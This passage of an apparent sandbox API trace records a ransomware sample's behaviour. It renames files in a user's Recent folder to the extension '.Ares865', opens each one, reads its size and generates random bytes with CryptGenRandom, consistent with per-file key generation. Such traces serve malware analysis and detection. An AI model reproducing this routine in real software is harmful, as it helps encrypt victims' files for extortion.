(hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.641] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UziFSNO1C3.lnk.Ares865") returned 59 [0093.642] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UziFSNO1C3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\uzifsno1c3.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UziFSNO1C3.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\uzifsno1c3.lnk.ares865"), dwFlags=0x1) returned 1 [0093.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UziFSNO1C3.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\uzifsno1c3.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.643] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3683) returned 1 [0093.643] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.644] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.644] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.644] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.645] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\V5cL YSs1MpdhLl.lnk.Ares865") returned 64 [0093.647] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\V5cL YSs1MpdhLl.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\v5cl yss1mpdhll.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\V5cL YSs1MpdhLl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\v5cl yss1mpdhll.lnk.ares865"), dwFlags=0x1) returned 1 [0093.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\V5cL YSs1MpdhLl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\v5cl yss1mpdhll.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.648] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5306) returned 1 [0093.648] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.649] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.649] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.650] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.652] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vAIw2ony.lnk.Ares865") returned 57 [0093.652] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vAIw2ony.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vaiw2ony.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vAIw2ony.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vaiw2ony.lnk.ares865"), dwFlags=0x1) returned 1 [0093.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vAIw2ony.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vaiw2ony.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.653] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=574) returned 1 [0093.653] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.654] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.654] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.662] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vn_ihpMYhbpaS.lnk.Ares865") returned 62 [0093.662] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vn_ihpMYhbpaS.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vn_ihpmyhbpas.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vn_ihpMYhbpaS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vn_ihpmyhbpas.lnk.ares865"), dwFlags=0x1) returned 1 [0093.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vn_ihpMYhbpaS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vn_ihpmyhbpas.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.664] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2648) returned 1 [0093.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vysylnVpAM6gDDg.ots.lnk.Ares865") returned 68 [0093.666] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vysylnVpAM6gDDg.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vysylnvpam6gddg.ots.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vysylnVpAM6gDDg.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vysylnvpam6gddg.ots.lnk.ares865"), dwFlags=0x1) returned 1 [0093.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\vysylnVpAM6gDDg.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vysylnvpam6gddg.ots.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.667] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3798) returned 1 [0093.677] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\VZjujdxgV1s-x I2.lnk.Ares865") returned 65 [0093.677] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\VZjujdxgV1s-x I2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vzjujdxgv1s-x i2.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\VZjujdxgV1s-x I2.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vzjujdxgv1s-x i2.lnk.ares865"), dwFlags=0x1) returned 1 [0093.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\VZjujdxgV1s-x I2.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\vzjujdxgv1s-x i2.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.679] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0093.681] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w-YiqrDrq.lnk.Ares865") returned 58 [0093.681] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w-YiqrDrq.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\w-yiqrdrq.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w-YiqrDrq.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\w-yiqrdrq.lnk.ares865"), dwFlags=0x1) returned 1 [0093.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w-YiqrDrq.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\w-yiqrdrq.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.682] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2604) returned 1 [0093.684] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w8loQe.lnk.Ares865") returned 55 [0093.684] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w8loQe.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\w8loqe.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w8loQe.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\w8loqe.lnk.ares865"), dwFlags=0x1) returned 1 [0093.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\w8loQe.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\w8loqe.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.685] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6633) returned 1 [0093.687] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\WLV6HYI5Srhb.lnk.Ares865") returned 61 [0093.687] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\WLV6HYI5Srhb.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\wlv6hyi5srhb.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\WLV6HYI5Srhb.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\wlv6hyi5srhb.lnk.ares865"), dwFlags=0x1) returned 1 [0093.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\WLV6HYI5Srhb.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\wlv6hyi5srhb.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.689] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3687) returned 1 [0093.691] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\X vjbeaqUS0.lnk.Ares865") returned 60 [0093.691] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\X vjbeaqUS0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\x vjbeaqus0.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\X vjbeaqUS0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\x vjbeaqus0.lnk.ares865"), dwFlags=0x1) returned 1 [0093.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\X vjbeaqUS0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\x vjbeaqus0.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3505) returned 1 [0093.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XfzH4NfYmvZDgjZ2.lnk.Ares865") returned 65 [0093.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XfzH4NfYmvZDgjZ2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\xfzh4nfymvzdgjz2.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XfzH4NfYmvZDgjZ2.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\xfzh4nfymvzdgjz2.lnk.ares865"), dwFlags=0x1) returned 1 [0093.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XfzH4NfYmvZDgjZ2.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\xfzh4nfymvzdgjz2.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.696] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0093.698] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XMnSL6YgY.lnk.Ares865") returned 58 [0093.698] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XMnSL6YgY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\xmnsl6ygy.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XMnSL6YgY.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\xmnsl6ygy.lnk.ares865"), dwFlags=0x1) returned 1 [0093.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\XMnSL6YgY.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\xmnsl6ygy.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1005) returned 1 [0093.701] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Y5VGp-XA f9VF.lnk.Ares865") returned 62 [0093.701] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Y5VGp-XA f9VF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\y5vgp-xa f9vf.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Y5VGp-XA f9VF.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\y5vgp-xa f9vf.lnk.ares865"), dwFlags=0x1) returned 1 [0093.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Y5VGp-XA f9VF.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\y5vgp-xa f9vf.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.702] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5284) returned 1 [0093.704] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ybOVwhV.lnk.Ares865") returned 56 [0093.704] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ybOVwhV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ybovwhv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ybOVwhV.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ybovwhv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ybOVwhV.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ybovwhv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.706] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8325) returned 1 [0093.708] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YDR8inGbRKsVbw.lnk.Ares865") returned 63 [0093.708] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YDR8inGbRKsVbw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ydr8ingbrksvbw.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YDR8inGbRKsVbw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ydr8ingbrksvbw.lnk.ares865"), dwFlags=0x1) returned 1 [0093.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YDR8inGbRKsVbw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ydr8ingbrksvbw.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.709] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2466) returned 1 [0093.711] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YoQRYxYo8-B_fTukX LN.lnk.Ares865") returned 69 [0093.711] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YoQRYxYo8-B_fTukX LN.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\yoqryxyo8-b_ftukx ln.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YoQRYxYo8-B_fTukX LN.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\yoqryxyo8-b_ftukx ln.lnk.ares865"), dwFlags=0x1) returned 1 [0093.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\YoQRYxYo8-B_fTukX LN.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\yoqryxyo8-b_ftukx ln.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2697) returned 1 [0093.714] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Yx0Dl5BqC1B3ZyaDpjc.flv.lnk.Ares865") returned 72 [0093.714] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Yx0Dl5BqC1B3ZyaDpjc.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\yx0dl5bqc1b3zyadpjc.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Yx0Dl5BqC1B3ZyaDpjc.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\yx0dl5bqc1b3zyadpjc.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Yx0Dl5BqC1B3ZyaDpjc.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\yx0dl5bqc1b3zyadpjc.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.715] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=811) returned 1 [0093.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ze OYHzopDMsBA3Y6i.lnk.Ares865") returned 67 [0093.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ze OYHzopDMsBA3Y6i.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ze oyhzopdmsba3y6i.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ze OYHzopDMsBA3Y6i.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ze oyhzopdmsba3y6i.lnk.ares865"), dwFlags=0x1) returned 1 [0093.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Ze OYHzopDMsBA3Y6i.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ze oyhzopdmsba3y6i.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.718] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5351) returned 1 [0093.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zHO vHz.flv.lnk.Ares865") returned 60 [0093.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zHO vHz.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\zho vhz.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zHO vHz.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\zho vhz.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zHO vHz.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\zho vhz.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2487) returned 1 [0093.724] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zrA4gg_U3I7qcYwB.lnk.Ares865") returned 65 [0093.724] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zrA4gg_U3I7qcYwB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\zra4gg_u3i7qcywb.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zrA4gg_U3I7qcYwB.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\zra4gg_u3i7qcywb.lnk.ares865"), dwFlags=0x1) returned 1 [0093.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zrA4gg_U3I7qcYwB.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\zra4gg_u3i7qcywb.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.725] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=609) returned 1 [0093.728] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zTuAS8zyaJQEKix.lnk.Ares865") returned 64 [0093.728] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zTuAS8zyaJQEKix.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ztuas8zyajqekix.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zTuAS8zyaJQEKix.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ztuas8zyajqekix.lnk.ares865"), dwFlags=0x1) returned 1 [0093.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\zTuAS8zyaJQEKix.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ztuas8zyajqekix.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.729] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3869) returned 1 [0093.731] wsprintfW (in: 